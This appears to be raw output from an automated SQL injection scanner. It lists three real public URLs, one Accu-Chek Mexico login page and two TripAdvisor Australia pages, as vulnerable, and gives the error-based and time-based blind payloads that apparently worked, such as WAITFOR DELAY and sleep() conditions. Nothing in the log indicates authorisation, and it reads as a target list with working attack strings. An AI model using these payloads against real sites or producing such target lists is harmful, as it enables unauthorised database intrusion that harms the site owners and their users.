Url: https://www.accu-chek.com.mx/user/login?destination=diabetescare&width=900&height=900, Injection: InjectionType.Sqli_PostForm_Error, Details: injFOUND:  syntax; URL: https://www.accu-chek.com.mx/user/login?destination=diabetescare&width=900&height=900; DETAILS: <![cdata[//><!--
      // open script tag to avoid syntax errors
//--><!]]>
</script>
<script type=";
Url: https://www.tripadvisor.com.au/business/businessadvantage?args=-m57398, Injection: InjectionType.Sqli_PostForm_Time, Details: SqliManager FORM delay FOUND! TRUE:1'; WAITFOR DELAY '00:00:05 ; FALSE:1'; WAITFOR DELAY '00:00:00
Url: https://www.tripadvisor.com.au/MetaPlacementAjax?detail=1014398&placementName=location_qa_resp%3Arr_responsive&servletClass=com.TripResearch.servlet.eatery.responsive.RestaurantReviewServlet&servletName=Restaurant_Review&metaReferer=Restaurant_Review&offset=0&updateContentRequest=true, Injection: InjectionType.Sqli_PostForm_Time, Details: SqliManager FORM delay FOUND! TRUE:'OR(if(1=1,sleep(5),0))OR' ; FALSE:'OR(if(1=2,sleep(5),0))OR'
